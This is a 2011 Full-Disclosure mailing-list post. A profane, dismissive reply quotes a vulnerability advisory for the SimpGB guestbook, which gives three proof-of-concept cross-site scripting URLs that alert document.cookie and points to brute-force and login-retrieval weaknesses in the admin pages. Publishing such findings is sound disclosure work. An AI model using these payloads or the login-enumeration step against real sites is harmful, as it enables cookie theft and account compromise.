[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Multiple vulnerabilities in SimpGB
- To: MustLive <mustlive@xxxxxxxxxxxxxxxxxx>
- Subject: Re: [Full-disclosure] Multiple vulnerabilities in SimpGB
- From: laurent gaffie <laurent.gaffie@xxxxxxxxx>
- Date: Thu, 27 Jan 2011 02:09:10 +1100
Send your shitty stuff to bugtraq@xxxxxxxxxxxxxxxxx
If it's not obvious, no one give a shit here, seriously.
2011/1/27 MustLive <mustlive@xxxxxxxxxxxxxxxxxx>
> Hello list!
>
> I want to warn you about Cross-Site Scripting, Brute Force, Insufficient
> Anti-automation and Abuse of Functionality vulnerabilities in SimpGB.
>
> -------------------------
> Affected products:
> -------------------------
>
> Vulnerable are SimpGB v1.49.02 and previous versions.
>
> ----------
> Details:
> ----------
>
> XSS (WASC-08):
>
> POST request at page http://site/guestbook.php in parameters poster,
> postingid and location in Preview function. If captcha is using in
> guestbook, then working code of the captcha is required for the attack. Or
> via GET request:
>
>
> http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview<http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&input_text=111111111111111111111111111111&preview=preview>
>
>
> http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&poster=1&input_text=111111111111111111111111111111&preview=preview<http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&poster=1&input_text=111111111111111111111111111111&preview=preview>
>
>
> http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=1&location=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview<http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=1&location=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&input_text=111111111111111111111111111111&preview=preview>
>
> Brute Force (WASC-11):
>
> http://site/admin/index.php
>
> Insufficient Anti-automation (WASC-21):
>
> http://site/admin/pwlost.php
>
> In this functionality there is no protection from automated requests
> (captcha).
>
> Abuse of Functionality (WASC-42):
>
> http://site/admin/pwlost.php
>
> In this functionality it's possible to retrieve logins.
>
> ------------
> Timeline:
> ------------
>
> 2010.11.17 - announced at my site.
> 2010.11.19 - informed developers.
> 2011.01.25 - disclosed at my site.
>
> I mentioned about these vulnerabilities at my site
> (http://websecurity.com.ua/4690/).
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/